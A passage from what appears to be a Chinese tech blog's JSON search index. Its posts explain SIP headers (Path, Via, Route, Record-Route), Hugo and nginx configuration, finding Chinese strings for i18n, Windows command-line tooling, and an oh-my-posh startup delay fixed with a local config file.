Gateway"},{"content":"RFC3261并没有介绍关于Path头的定义,因为这个头是在RFC3327中定义的,Path头作为一个SIP的扩展头。\nRFC3327的标题是:Session Initiation Protocol (SIP) Extension Header Field for Registering Non-Adjacent Contacts。\n从这个标题可以看出,Path头是作为Register请求的一个消息头,一般这个头只在注册消息上才有。\n这个头的格式如下。\nPath: \u0026lt;sip:P1.EXAMPLEVISITED.COM;lr\u0026gt; 从功能上说,Path头和record-route头的功能非常相似,但是也不同。\n看下面的一个场景,uac通过p1和p2, 将注册请求发送到uas, 在某一时刻,uac作为被叫,INVITE请求要从uas发送到uac, 这时候,INVITE请求应该怎么走?\n假如我们希望INVITE请求要经过p2,p1,然后再发送到uac, Path头的作用就是这个。\n注册请求经过P1时,P1在注册消息上加上p1地址的path头 注册请求经过P2时,P2在注册消息上加上p2地址的path头 注册请求到达uas时,uas从Contact头上获取到uac的地址信息,然后从两个Path头上获取到如下信息:如果要打电话给uac, Path头会转变为route头,用来定义INVITE请求的路径。 简单定义:Path头一般用在注册消息里,Path头定义了uac作为被叫时,INVITE请求的发送路径。\n参考 ","permalink":"https://wdd.js.org/opensips/ch1/sip-path/","summary":"RFC3261并没有介绍关于Path头的定义,因为这个头是在RFC3327中定义的,Path头作为一个SIP的扩展头。\nRFC3327的标题是:Session Initiation Protocol (SIP) Extension Header Field for Registering Non-Adjacent Contacts。\n从这个标题可以看出,Path头是作为Register请求的一个消息头,一般这个头只在注册消息上才有。\n这个头的格式如下。\nPath: \u0026lt;sip:P1.EXAMPLEVISITED.COM;lr\u0026gt; 从功能上说,Path头和record-route头的功能非常相似,但是也不同。\n看下面的一个场景,uac通过p1和p2, 将注册请求发送到uas, 在某一时刻,uac作为被叫,INVITE请求要从uas发送到uac, 这时候,INVITE请求应该怎么走?\n假如我们希望INVITE请求要经过p2,p1,然后再发送到uac, Path头的作用就是这个。\n注册请求经过P1时,P1在注册消息上加上p1地址的path头 注册请求经过P2时,P2在注册消息上加上p2地址的path头 注册请求到达uas时,uas从Contact头上获取到uac的地址信息,然后从两个Path头上获取到如下信息:如果要打电话给uac, Path头会转变为route头,用来定义INVITE请求的路径。 简单定义:Path头一般用在注册消息里,Path头定义了uac作为被叫时,INVITE请求的发送路径。\n参考 ","title":"Path头简史"},{"content":"写好了博客,但是没有在网页上渲染出来,岂不是很气人!\n我的archtypes/default.md配置如下\n--- title: \u0026#34;{{ replace .Name \u0026#34;-\u0026#34; \u0026#34; \u0026#34; | title }}\u0026#34; date: \u0026#34;{{ now.Format \u0026#34;2006-01-02 15:04:05\u0026#34; }}\u0026#34; draft: false --- 当使用 hugo new 创建一个文章的时候,有如下的头\n--- title: \u0026#34;01: 学习建议\u0026#34; date: \u0026#34;2022-09-03 10:23:10\u0026#34; draft: false --- Hugo 默认采用的是 格林尼治平时 (GMT),比北京时间 (UTC+8) 晚了 8 个小时,Hugo 
在生成静态页面的时候,不会生成超过当前时间的文章。\n如果把北京时间当作格林尼治时间来计算,那么肯定还没有超过当前时间。\n所以我们要给站点设置时区。\n在config.yaml增加如下内容\ntimeZone: \u0026#34;Asia/Shanghai\u0026#34; ","permalink":"https://wdd.js.org/posts/2022/09/hugo-timezone/","summary":"写好了博客,但是没有在网页上渲染出来,岂不是很气人!\n我的archetypes/default.md配置如下\n--- title: \u0026#34;{{ replace .Name \u0026#34;-\u0026#34; \u0026#34; \u0026#34; | title }}\u0026#34; date: \u0026#34;{{ now.Format \u0026#34;2006-01-02 15:04:05\u0026#34; }}\u0026#34; draft: false --- 当使用 hugo new 创建一个文章的时候,有如下的头\n--- title: \u0026#34;01: 学习建议\u0026#34; date: \u0026#34;2022-09-03 10:23:10\u0026#34; draft: false --- Hugo 默认采用的是 格林尼治平时 (GMT),比北京时间 (UTC+8) 晚了 8 个小时,Hugo 在生成静态页面的时候,不会生成超过当前时间的文章。\n如果把北京时间当作格林尼治时间来计算,那么肯定还没有超过当前时间。\n所以我们要给站点设置时区。\n在config.yaml增加如下内容\ntimeZone: \u0026#34;Asia/Shanghai\u0026#34; ","title":"Hugo Timezone没有设置, 导致页面无法渲染"},{"content":" sequenceDiagram title French Words I Know autonumber participant a participant p1 participant p2 participant p3 participant b a-\u003e\u003ep1 : INVITE route: p1, via: a p1-\u003e\u003ep2: INVITE via: a,p1, rr: p1 p2-\u003e\u003ep3: INVITE via: a,p1,p2 rr: p1,p2 p3-\u003e\u003eb: INVITE via: a,p1,p2,p3 rr: p1,p2,p3 b--\u003e\u003ep3: 180 via: a,p1,p2,p3 rr: p1,p2,p3 p3--\u003e\u003ep2: 180 via: a,p1,p2 rr: p1,p2,p3 p2--\u003e\u003ep1: 180 via: a,p1 rr: p1,p2,p3 p1--\u003e\u003ea: 180 via: a rr: p1,p2,p3 b--\u003e\u003ep3: 200 OK via: a,p1,p2,p3 rr: p1,p2,p3 p3--\u003e\u003ep2: 200 Ok via: a,p1,p2 rr: p1,p2,p3 p2--\u003e\u003ep1: 200 Ok via: a,p1 rr: p1,p2,p3 p1--\u003e\u003ea: 200 Ok via: a rr: p1,p2,p3 a-\u003e\u003ep1 : ACK via: a, route: p1,p2,p3 p1-\u003e\u003ep2: ACK via: a,p1, route: p2,p3 p2-\u003e\u003ep3: ACK via: a,p1,p2 route: p3 p3-\u003e\u003eb: ACK via: a,p1,p2,p3 rr代表record-route头。\nTip Via 何时添加: 请求从ua或者代理发出去时,发送方会加上自己的via 何时删除: 响应按原路返回时,每个节点会删除指向自己的via 作用: Via的作用是让sip消息能够按照原路返回 比喻: 第一次离开家的人,只有每次经过一个地方,就记下地名。那么在回家的时候,他才能按照原来的路径返回。 Tip route 何时添加: 当请求从uac发出去时 何时删除: 请求经过route头指定的代理时,该代理会删除指向自己的route头 作用: 
route的作用是指明下一站的目的地。虽然route头是在请求发送出去时就添加,但是可以仅添加一个。 比喻: 第一次离开家的人,可能并不知道如何到达海南,但是他知道如何到达自己的省会。这个省会就是sip终端配置的外呼代理。每次经过一个站点时,就把这个站点记录到record-route中。record-route会在180或者183,或200ok时,发送给主叫的话机。 Tip record-route 何时添加: 初始请求每经过一个代理服务器时,由代理添加 何时删除: 一般不删除,会随1xx或者200的响应原样返回给ua 作用: 为dialog中的后续请求,指明到达目的地的路径 比喻: 当一个uac收到180之后,这个180中带有了record-route,例如p1,p2,p3。那么后续的ACK请求,就可以利用record-route来生成route: p1, p2, p3。 Address-of-Record: An address-of-record (AOR) is a SIP or SIPS URI that points to a domain with a location service that can map the URI to another URI where the user might be available. Typically, the location service is populated through registrations. An AOR is frequently thought of as the \u0026ldquo;public address\u0026rdquo; of the user. \u0026ndash; rfc3261\nThe difference between a contact address and an address-of-record is like the difference between a device and its user. While there is no formal distinction in the syntax of these two forms of addresses, contact addresses are associated with a particular device, and may have a very device-specific form (like sip:10.0.0.1, or sip:edgar@ua21.example.com). An address-of-record, however, represents an identity of the user, generally a long-term identity, and it does not have a dependency on any device; users can move between devices or even be associated with multiple devices at one time while retaining the same address-of-record. A simple URI, generally of the form \u0026lsquo;sip:egdar@example.com\u0026rsquo;, is used for an address-of-record. \u0026ndash;rfc3764\n1. 
Record-route写法 u1 -\u0026gt; p1 -\u0026gt; p2 -\u0026gt; p3 -\u0026gt; p4,\n最后经过的排在最上面或者最前面。\n多行写法\nINVITE sip:callee@u2.domain.com SIP/2.0 Contact: sip:caller@u1.example.com Record-Route: \u0026lt;sip:p4.domain.com;lr\u0026gt; Record-Route: \u0026lt;sip:p3.middle.com\u0026gt; Record-Route: \u0026lt;sip:p2.example.com;lr\u0026gt; Record-Route: \u0026lt;sip:p1.example.com;lr\u0026gt; Record-Route记录的是从主叫到被叫的过程,其中Record-Route的顺序非常重要。因为这个顺序会影响Route字段的顺序。\n因为loose_route是从最上面的route字段来决定下一跳的地址。\n所以,对于主叫来说,route的顺序和Record-Route相反。对于被叫来说,route字段和Record-Route字段相同。\n对于某些使用不同协议对接的不同代理的时候,会一次性的增加两次Record-Route。\n例如下面的,AB之间是tcp的,BC之间是udp的。那么INVITE从A到C之后,会在最上面增加两个。 A \u0026ndash;tcp\u0026ndash; B \u0026ndash;udp\u0026ndash; C\nRecord-Route: \u0026lt;sip:B_ip;transport=udp\u0026gt; Record-Route: \u0026lt;sip:B_ip;transport=tcp\u0026gt; 单行写法\nINVITE sip:callee@u2.domain.com SIP/2.0 Contact: sip:caller@u1.example.com Record-Route: \u0026lt;sip:p4.domain.com;lr\u0026gt;,\u0026lt;sip:p3.middle.com\u0026gt;,\u0026lt;sip:p2.example.com;lr\u0026gt;,\u0026lt;sip:p1.example.com;lr\u0026gt; 2. 
Via 写法 最新的排在最上面 ","permalink":"https://wdd.js.org/opensips/ch1/via-route-record-route/","summary":"sequenceDiagram title French Words I Know autonumber participant a participant p1 participant p2 participant p3 participant b a-\u003e\u003ep1 : INVITE route: p1, via: a p1-\u003e\u003ep2: INVITE via: a,p1, rr: p1 p2-\u003e\u003ep3: INVITE via: a,p1,p2 rr: p1,p2 p3-\u003e\u003eb: INVITE via: a,p1,p2,p3 rr: p1,p2,p3 b--\u003e\u003ep3: 180 via: a,p1,p2,p3 rr: p1,p2,p3 p3--\u003e\u003ep2: 180 via: a,p1,p2 rr: p1,p2,p3 p2--\u003e\u003ep1: 180 via: a,p1 rr: p1,p2,p3 p1--\u003e\u003ea: 180 via: a rr: p1,p2,p3 b--\u003e\u003ep3: 200 OK via: a,p1,p2,p3 rr: p1,p2,p3 p3--\u003e\u003ep2: 200 Ok via: a,p1,p2 rr: p1,p2,p3 p2--\u003e\u003ep1: 200 Ok via: a,p1 rr: p1,p2,p3 p1--\u003e\u003ea: 200 Ok via: a rr: p1,p2,p3 a-\u003e\u003ep1 : ACK via: a, route: p1,p2,p3 p1-\u003e\u003ep2: ACK via: a,p1, route: p2,p3 p2-\u003e\u003ep3: ACK via: a,p1,p2 route: p3 p3-\u003e\u003eb: ACK via: a,p1,p2,p3 rr代表record-route头。","title":"Via route Record-Route的区别"},{"content":"SIP是VoIP的基石,相当于HTTP协议在Web服务器里的角色。如果你熟悉HTTP协议,那么你可以在SIP协议中找到许多和HTTP中熟悉的东西,例如请求头,请求体,响应码之类概念,这是因为SIP协议的设计,很大程度上参考了HTTP协议。\n如果想要学习VoIP,那么SIP协议是你务必掌握敲门砖。\n1. SIP组件 UAC: 例如sip终端,软电话,话机 UAS: sip服务器 UA: ua既可以当做uac也可以当做uas 代理服务器 重定向服务器 注册服务器 网关 PSTN 公共交换电话网 2. SBC 边界会话控制器 SBC是Session Border Controller的缩写,具有一下几个功能。\n拓扑隐藏:隐藏所有内部网络的信息。 媒体流管理:设置语音流编码规则,转换等 增加能力:例如Refer, 3CPP 维护NAT映射: 访问控制 媒体加密:例如外部网络用SRTP, 内部网络用RTP 3. sip注册过程 下面简化注册逻辑,省略了验证和过期等字段:\n对于分机来说,注册服务器的地址是需要设置的 分机向注册服务器发请求,说:你好,注册服务器,我是8005,我的地址是200.180.1.1,以后你可以用这个地址联系我。 注册服务器回复:好的,注册成功 4. sip服务器的类型 4.1. 代理服务器 4.2. 重定向服务器 4.3. 背靠背UA服务器 背靠背UA服务器有两个作用\n隐藏网络拓扑结构 有些时候,路由无法到达,只能用背靠背UA服务器 5. 常用sip请求方法 比较常用的是下面的\n常用的几个是:register, invite, ack, bye, cancel。除了cancel和ack不需要认证外,其余的请求都需要认证。 register自不必说,invite和bye是需要认证的。\n对于我们不信任的ua,我们不允许他们呼叫。对于未认证的bye,也需要禁止。后者可以防止恶意的bye请求,挂断正常的呼叫。\ninvite除了re-invite的情况,其余的都属于初始化请求,需要着重关心的。而对于bye这种序列化请求,只需要按照record-route去路由。\n6. sip响应状态码 7. 
sip对话流程图 从上图可以看出,从invite请求到200ok之间的信令,都经过了代理服务器。但是200ok之后的ack,确没有经过代理服务器,如果想要所有信令都经过代理服务器,需要在sip消息头record-routing 指定代理服务器的地址\n8. 请求与响应报文 9. 事务与对话的区别 重点:\n从INVITE请求到最终的响应(注意1xx不是最终响应,非1xx的都是最终响应)之间,称为事务。一个事务可以带有多个消息组成,并经过多个ua。 ack请求比较特殊,但是ack不是事务。如果被叫接通后,超时未收到主叫方的ack, 会怎样?是否会再次发送200OK tcp三次握手建立连接,sip:invite-\u0026gt;200ok-\u0026gt;ack,可以理解为三次握手建立对话。 bye请求和200ok算作一个事务 dialog建立的前提是呼叫接通,如果呼叫没有接通,则没有dialog。 dialog可以由三个元素唯一确定。callId, from字段中的tag, to字段中的tag。 10. sip底层协议 SIP协议的结构 SIP协议是一个分层的协议,意味着各层之间是相互独立的\n最底层:SIP编码的语法 BNF语法 第二层:传输层 传输层定义如何接收和发送消息,SIP常用的传输层可以是udp, tcp, websocket等等 第三层:事务层 事务是一个请求和最终的响应称为一个事务,例如invite, 200ok是一个事务 第四层:事务用户层 所有的SIP实体,除了无状态的代理,都称为事务用户层。常见的uac, uas都是事务用户层 11. voip总体架构 12. 参考 ","permalink":"https://wdd.js.org/opensips/ch1/sip-overview/","summary":"SIP是VoIP的基石,相当于HTTP协议在Web服务器里的角色。如果你熟悉HTTP协议,那么你可以在SIP协议中找到许多和HTTP中熟悉的东西,例如请求头,请求体,响应码之类概念,这是因为SIP协议的设计,很大程度上参考了HTTP协议。\n如果想要学习VoIP,那么SIP协议是你务必掌握敲门砖。\n1. SIP组件 UAC: 例如sip终端,软电话,话机 UAS: sip服务器 UA: ua既可以当做uac也可以当做uas 代理服务器 重定向服务器 注册服务器 网关 PSTN 公共交换电话网 2. SBC 边界会话控制器 SBC是Session Border Controller的缩写,具有一下几个功能。\n拓扑隐藏:隐藏所有内部网络的信息。 媒体流管理:设置语音流编码规则,转换等 增加能力:例如Refer, 3CPP 维护NAT映射: 访问控制 媒体加密:例如外部网络用SRTP, 内部网络用RTP 3. sip注册过程 下面简化注册逻辑,省略了验证和过期等字段:\n对于分机来说,注册服务器的地址是需要设置的 分机向注册服务器发请求,说:你好,注册服务器,我是8005,我的地址是200.180.1.1,以后你可以用这个地址联系我。 注册服务器回复:好的,注册成功 4. sip服务器的类型 4.1. 代理服务器 4.2. 重定向服务器 4.3. 背靠背UA服务器 背靠背UA服务器有两个作用\n隐藏网络拓扑结构 有些时候,路由无法到达,只能用背靠背UA服务器 5. 常用sip请求方法 比较常用的是下面的\n常用的几个是:register, invite, ack, bye, cancel。除了cancel和ack不需要认证外,其余的请求都需要认证。 register自不必说,invite和bye是需要认证的。\n对于我们不信任的ua,我们不允许他们呼叫。对于未认证的bye,也需要禁止。后者可以防止恶意的bye请求,挂断正常的呼叫。\ninvite除了re-invite的情况,其余的都属于初始化请求,需要着重关心的。而对于bye这种序列化请求,只需要按照record-route去路由。\n6. sip响应状态码 7. sip对话流程图 从上图可以看出,从invite请求到200ok之间的信令,都经过了代理服务器。但是200ok之后的ack,确没有经过代理服务器,如果想要所有信令都经过代理服务器,需要在sip消息头record-routing 指定代理服务器的地址\n8. 请求与响应报文 9. 
事务与对话的区别 重点:\n从INVITE请求到最终的响应(注意1xx不是最终响应,非1xx的都是最终响应)之间,称为事务。一个事务可以带有多个消息组成,并经过多个ua。 ack请求比较特殊,但是ack不是事务。如果被叫接通后,超时未收到主叫方的ack, 会怎样?是否会再次发送200OK tcp三次握手建立连接,sip:invite-\u0026gt;200ok-\u0026gt;ack,可以理解为三次握手建立对话。 bye请求和200ok算作一个事务 dialog建立的前提是呼叫接通,如果呼叫没有接通,则没有dialog。 dialog可以由三个元素唯一确定。callId, from字段中的tag, to字段中的tag。 10.","title":"SIP协议简介"},{"content":"1. 概念理解 务必要能理解SIP的重要概念,特别是事务、Dialog。参考https://www.yuque.com/wangdd/opensips/fx5pyy 概念是非常重要的东西,不理解概念,越学就会越吃力 2. 时序图 时序图是非常重要的,培训时,一般我会要求学员务必能够手工绘制时序图。因为只有能够手工绘制时序图了,在排查问题时,才能够从抓包工具给出的时序图中分析出问题所在。\nRFC3665 https://datatracker.ietf.org/doc/html/rfc3665 中提供了很多经典的时序图,建议可以去临摹。\n","permalink":"https://wdd.js.org/opensips/ch1/study-tips/","summary":"1. 概念理解 务必要能理解SIP的重要概念,特别是事务、Dialog。参考https://www.yuque.com/wangdd/opensips/fx5pyy 概念是非常重要的东西,不理解概念,越学就会越吃力 2. 时序图 时序图是非常重要的,培训时,一般我会要求学员务必能够手工绘制时序图。因为只有能够手工绘制时序图了,在排查问题时,才能够从抓包工具给出的时序图中分析出问题所在。\nRFC3665 https://datatracker.ietf.org/doc/html/rfc3665 中提供了很多经典的时序图,建议可以去临摹。","title":"学习建议"},{"content":" 书名 Packet Guide to Voip over IP 作者 Bruce Hartpence 状态 已读完 简介 Go under the hood of an operating Voice over IP network, and build your knowledge of protocol \u0026hellip;. 读后感 新技术出现的时机 Pulling the trigger early might put you at risk of making the wrong decision in terms of vendor or protocol. Adopting late might put you behind the competition or make you rush to deploy a system that is not well understood by the local staff.\n技术应用出现的太早则会承受巨大的风险,出现的太晚则失去竞争力。\n两种SIP信令 VoIP protocols are broken into two categories: signaling and transport.\nVoIP的信令可以分为两类,传输信令 与 传输媒体\n美梦与噩梦 It was a golden dream for some (consumers) and a nightmare for others; namely, the providers.\n新技术的出现,对开拓者来说是黄金美梦,对守旧者来说,则是噩梦。\n出局 Some of these services offered calling plans for less than half the price of traditional carriers. 
Some of them, most notably Skype, had as one of their goals putting telephone companies out of business\nUDP的另一种理解 In fact,UDP is sometimes considered a fire-and-forget protocol because once the packet leaves the sender, we think nothing more about it.\nUDP可以理解成一种一旦发送,则忘记的协议。\n","permalink":"https://wdd.js.org/posts/2022/07/vl3zhk/","summary":"书名 Packet Guide to Voip over IP 作者 Bruce Hartpence 状态 已读完 简介 Go under the hood of an operating Voice over IP network, and build your knowledge of protocol \u0026hellip;. 读后感 新技术出现的时机 Pulling the trigger early might put you at risk of making the wrong decision in terms of vendor or protocol. Adopting late might put you behind the competition or make you rush to deploy a system that is not well understood by the local staff.","title":"读书笔记 - Packet Guide to VoIP"},{"content":"1. 前提说明 项目已经处于维护期 项目一开始并没有考虑多语言,所以很多地方都是写死的中文 现在要给这个项目添加多语言适配 2. 工具选择 https://www.npmjs.com/package/i18n https://www.npmjs.com/package/vue-i18n 3. 难点 项目很大,中文可能存在于各种文件中,例如html, vue, js, typescript等等, 人工查找不现实 所以首先第一步是要找出所有的中文语句 4. 让文本飞 安装ripgrep apt-get instal ripgrep 搜索所有包含中文的代码: rg -e '[\\p{Han}]' \u0026gt; han.all.md 给所有包含中文的代码,按照文件名,和出现的次数排序: cat han.all.md | awk -F: '{print $1}' | uniq -c | sort -nr \u0026gt; stat.han.md 这一步主要是看看哪些文件包含的中文比较多 按照中文的语句,排序并统计出现的次数: cat han.all.md |rg -o -e '([\\p{Han}]+)' | sort | uniq -c | sort -nr \u0026gt; word.han.md 经过上面4步,基本上可以定位出哪些代码中包含中文,中文的语句有哪些。\n","permalink":"https://wdd.js.org/posts/2022/07/mv0hk1/","summary":"1. 前提说明 项目已经处于维护期 项目一开始并没有考虑多语言,所以很多地方都是写死的中文 现在要给这个项目添加多语言适配 2. 工具选择 https://www.npmjs.com/package/i18n https://www.npmjs.com/package/vue-i18n 3. 难点 项目很大,中文可能存在于各种文件中,例如html, vue, js, typescript等等, 人工查找不现实 所以首先第一步是要找出所有的中文语句 4. 
让文本飞 安装ripgrep apt-get install ripgrep 搜索所有包含中文的代码: rg -e '[\p{Han}]' \u0026gt; han.all.md 给所有包含中文的代码,按照文件名,和出现的次数排序: cat han.all.md | awk -F: '{print $1}' | uniq -c | sort -nr \u0026gt; stat.han.md 这一步主要是看看哪些文件包含的中文比较多 按照中文的语句,排序并统计出现的次数: cat han.all.md |rg -o -e '([\p{Han}]+)' | sort | uniq -c | sort -nr \u0026gt; word.han.md 经过上面4步,基本上可以定位出哪些代码中包含中文,中文的语句有哪些。","title":"中途多语言适配"},{"content":" 1. 我为什么会知道0 A.D. 这款游戏? 最近切换到windows开发,用了scoop这个包管理工具来安装软件,随便逛逛的时候,发现scoop还可以用来安装游戏,然后我就在里面看了一下,然后排名第一的是一个名叫 0 A.D.的游戏,然后我就安装,并试玩了一下。\n2. 0 A.D. 这个名字是啥意思? 基督教称耶稣诞生的那年为公元元年, A.D. 就是Anno Domini(A.D.)(拉丁)的缩写,对应的公元前就是在耶稣诞生之前,称为B.C. Before Christ(B.C.).\n我们现在的阳历,例如今年是2022年,这其实就是公元2022年。对应的公元元年,对中国来说,大致在西汉年间。\n所以 0 A.D. 的意思其实就是一个不存在的元年。\n“0 A.D.” is a time period that never actually existed:\n3. 0 A.D. 是什么类型的游戏? 如果你玩过红警,0 A.D.有点像红警。 官方的介绍0AD是一个基于历史的实时策略游戏。 如果你玩过部落冲突,0AD其实也有点类似部落冲突。\n4. 0 A.D. 有什么特点? 跨平台, windows, mac, linux都可以玩 免费 历史悠久,项目开始于2001 还处于开发阶段 可玩性还不错 基于真实历史,所以玩游戏的时候,也是能够学点历史的。里面有14个文明。 5. 有哪些玩法 单机和AI对战 在线组队玩 6. FAQ 如何设置中文界面 默认的游戏不带中文语言的,实际上它是有中文的语言包的,可以参考 参考 https://baike.baidu.com/item/%E5%85%AC%E5%85%83/17855 ","permalink":"https://wdd.js.org/posts/2022/07/gxog1n/","summary":" 1. 我为什么会知道0 A.D. 这款游戏? 最近切换到windows开发,用了scoop这个包管理工具来安装软件,随便逛逛的时候,发现scoop还可以用来安装游戏,然后我就在里面看了一下,然后排名第一的是一个名叫 0 A.D.的游戏,然后我就安装,并试玩了一下。\n2. 0 A.D. 这个名字是啥意思? 基督教称耶稣诞生的那年为公元元年, A.D. 就是Anno Domini(A.D.)(拉丁)的缩写,对应的公元前就是在耶稣诞生之前,称为B.C. Before Christ(B.C.).\n我们现在的阳历,例如今年是2022年,这其实就是公元2022年。对应的公元元年,对中国来说,大致在西汉年间。\n所以 0 A.D. 的意思其实就是一个不存在的元年。\n“0 A.D.” is a time period that never actually existed:\n3. 0 A.D. 是什么类型的游戏? 如果你玩过红警,0 A.D.有点像红警。 官方的介绍0AD是一个基于历史的实时策略游戏。 如果你玩过部落冲突,0AD其实也有点类似部落冲突。\n4. 0 A.D. 有什么特点? 跨平台, windows, mac, linux都可以玩 免费 历史悠久,项目开始于2001 还处于开发阶段 可玩性还不错 基于真实历史,所以玩游戏的时候,也是能够学点历史的。里面有14个文明。 5. 有哪些玩法 单机和AI对战 在线组队玩 6. FAQ 如何设置中文界面 默认的游戏不带中文语言的,实际上它是有中文的语言包的,可以参考 参考 https://baike.baidu.com/item/%E5%85%AC%E5%85%83/17855 ","title":"0 A.D. 
一款开发了21年还未release的游戏"},{"content":"HTTP URL的格式复习 scheme://user:password@host:port/path;params?query#frag\nscheme 协议, 常见的有http, https, file, ftp等 user:password 用户名和密码 host 主机或者IP port 端口号 path 路径 params 参数 用的比较少 query 查询参数 frag 片段,资源的一部分,浏览器不会把这部分发给服务端 关于frag片段 浏览器加载一个网页,网页可能有很多章节的内容,frag片段可以告诉浏览器,应该将某个特定的点显示在浏览器中。\n例如 https://github.com/wangduanduan/jsplumb-chinese-tutorial/blob/master/api/anchors.js#L18\n这里的#L18就是一个frag片段, 当浏览器打开这个页面时,就会跳到对应的行\n在网络面板,也可以看到,实际上浏览器发出的请求,也没有带有frag参数\nVue 在Vue中,默认的路由就是这种frag片段。 这种路由只对浏览器有效,并不会发送到服务端。\n所以在一个单页应用中,服务端是无法根据URL知道用户访问的是什么页面的。\n所以实际上nginx无法根据frag片段进行拦截。\nnginx路径拦截 location [modifier] [URI] { ... ... } modifier\n= 完全匹配 ^~ 前缀匹配,命中最长前缀后不再进行正则匹配 ~ 正则匹配,且大小写敏感 ~* 正则匹配,大小写不敏感 nginx路径匹配规则\n首先是完全匹配,一旦匹配,则匹配结束,进行后续数据处理 完全匹配无法找到,则进行最长URL匹配,类似 ^~ 最长匹配找不到,则按照 ~或者~*的方式匹配 最后按照 / 的默认匹配 ","permalink":"https://wdd.js.org/posts/2022/07/gt6a84/","summary":"HTTP URL的格式复习 scheme://user:password@host:port/path;params?query#frag\nscheme 协议, 常见的有http, https, file, ftp等 user:password 用户名和密码 host 主机或者IP port 端口号 path 路径 params 参数 用的比较少 query 查询参数 frag 片段,资源的一部分,浏览器不会把这部分发给服务端 关于frag片段 浏览器加载一个网页,网页可能有很多章节的内容,frag片段可以告诉浏览器,应该将某个特定的点显示在浏览器中。\n例如 https://github.com/wangduanduan/jsplumb-chinese-tutorial/blob/master/api/anchors.js#L18\n这里的#L18就是一个frag片段, 当浏览器打开这个页面时,就会跳到对应的行\n在网络面板,也可以看到,实际上浏览器发出的请求,也没有带有frag参数\nVue 在Vue中,默认的路由就是这种frag片段。 这种路由只对浏览器有效,并不会发送到服务端。\n所以在一个单页应用中,服务端是无法根据URL知道用户访问的是什么页面的。\n所以实际上nginx无法根据frag片段进行拦截。\nnginx路径拦截 location [modifier] [URI] { ... ... 
} modifier\n= 完全匹配 ^~ 前缀匹配,命中最长前缀后不再进行正则匹配 ~ 正则匹配,且大小写敏感 ~* 正则匹配,大小写不敏感 nginx路径匹配规则\n首先是完全匹配,一旦匹配,则匹配结束,进行后续数据处理 完全匹配无法找到,则进行最长URL匹配,类似 ^~ 最长匹配找不到,则按照 ~或者~*的方式匹配 最后按照 / 的默认匹配 ","title":"请问nginx 能否根据 frag 片段 进行路径转发?"},{"content":"我已经有5年没有用过windows了,再次在windows上搞开发,发现了windows对于开发者来说,友好了不少。\n首先是windows terminal, 这个终端做的还不错。\n其次是一些常用的命令,比如说ssh, scp等,都已经默认附带了,不用再安装。\n还有包管理工具scoop, 命令行提示工具 oh-my-posh, 以及powershell 7 加载一起,基本可以迁移80%左右的linux上的开发环境。\n特别要说明一下scoop, 这个包管理工具,我安装了在linux上常用的一些软件。\n包括有以下的软件,而且软件的版本都还蛮新的。\n0ad 0.0.25b games 7zip 22.00 main curl 7.84.0_4 main curlie 1.6.9 main diff-so-fancy 1.4.3 main duf 0.8.1 main everything gawk 5.1.1 main git 2.37.0.windows.1 main git-aliases 0.3.5 extras git-chglog 0.15.1 main gzip 1.3.12 main hostctl 1.1.2 main hugo 0.101.0 main jq 1.6 main klogg 22.06.0.1289 extras make 4.3 main neofetch 7.1.0 main neovim 0.7.2 main 
netcat 1.","title":"windows 上的命令行体验"},{"content":"每次打开新的标签页,Powershell 都会输出下面的代码\nLoading personal and system profiles took 3566ms. 时间不固定,有时1s到10s都可能有,时间不固定。 这个加载速度是非常慢的。\n然后我打开一个非oh-my-posh的窗口,输入\noh-my-posh debug 看到其中几行日志:\n2022/07/09 12:20:23 error: HTTPRequest Get \u0026#34;https://raw.githubusercontent.com/JanDeDobbeleer/oh-my-posh/v8.15.0/themes/default.omp.json\u0026#34;: context deadline exceeded 2022/07/09 12:20:23 HTTPRequest duration: 5.0072715s, args: https://raw.githubusercontent.com/JanDeDobbeleer/oh-my-posh/v8.15.0/themes/default.omp.json 2022/07/09 12:20:23 downloadConfig duration: 5.0072715s, args: https://raw.githubusercontent.com/JanDeDobbeleer/oh-my-posh/v8.15.0/themes/default.omp.json 2022/07/09 12:20:23 resolveConfigPath duration: 5.0072715s, args: 2022/07/09 12:20:23 Init duration: 5.0072715s, args: 好家伙,原来每次启动,oh-my-posh还去github上下载了一个文件。\n因为下载文件而拖慢了整个启动过程。\n然后在github issue上倒找:https://github.com/JanDeDobbeleer/oh-my-posh/issues/2251\noh-my-posh init pwsh \u0026ndash;config ~/default.omp.json\n其中关键一点是启动oh-my-posh的时候,如果不用\u0026ndash;config配置默认的文件,oh-my-posh就回去下载默认的配置文件。\n所以问题就好解决了。\n首先下载https://raw.githubusercontent.com/JanDeDobbeleer/oh-my-posh/v8.15.0/themes/default.omp.json 这个文件,然后再保存到用户的家目录里面。\n然后打开terminal, 输入: code $profile\n前提是你的电脑上要装过vscode, 然后给默认的profile加上\u0026ndash;config参数,试了一下,问题解决。\noh-my-posh init pwsh --config ~/default.omp.json | Invoke-Expression Import-Module PSReadLine New-Alias -Name ll -Value ls if ($host.Name -eq \u0026#39;ConsoleHost\u0026#39;) { Import-Module PSReadLine Set-PSReadLineOption -EditMode Emacs } ","permalink":"https://wdd.js.org/posts/2022/07/igur01/","summary":"每次打开新的标签页,Powershell 都会输出下面的代码\nLoading personal and system profiles took 3566ms. 
时间不固定,有时1s到10s都可能有。 这个加载速度是非常慢的。\n然后我打开一个非oh-my-posh的窗口,输入\noh-my-posh debug 看到其中几行日志:\n2022/07/09 12:20:23 error: HTTPRequest Get \u0026#34;https://raw.githubusercontent.com/JanDeDobbeleer/oh-my-posh/v8.15.0/themes/default.omp.json\u0026#34;: context deadline exceeded 2022/07/09 12:20:23 HTTPRequest duration: 5.0072715s, args: https://raw.githubusercontent.com/JanDeDobbeleer/oh-my-posh/v8.15.0/themes/default.omp.json 2022/07/09 12:20:23 downloadConfig duration: 5.0072715s, args: https://raw.githubusercontent.com/JanDeDobbeleer/oh-my-posh/v8.15.0/themes/default.omp.json 2022/07/09 12:20:23 resolveConfigPath duration: 5.0072715s, args: 2022/07/09 12:20:23 Init duration: 5.0072715s, args: 好家伙,原来每次启动,oh-my-posh还去github上下载了一个文件。\n因为下载文件而拖慢了整个启动过程。\n然后在github issue上找到:https://github.com/JanDeDobbeleer/oh-my-posh/issues/2251\noh-my-posh init pwsh \u0026ndash;config ~/default.omp.json\n其中关键一点是启动oh-my-posh的时候,如果不用\u0026ndash;config配置默认的文件,oh-my-posh就会去下载默认的配置文件。\n所以问题就好解决了。\n首先下载https://raw.githubusercontent.com/JanDeDobbeleer/oh-my-posh/v8.15.0/themes/default.omp.json 这个文件,然后再保存到用户的家目录里面。\n然后打开terminal, 输入: code $profile\n前提是你的电脑上要装过vscode, 然后给默认的profile加上\u0026ndash;config参数,试了一下,问题解决。\noh-my-posh init 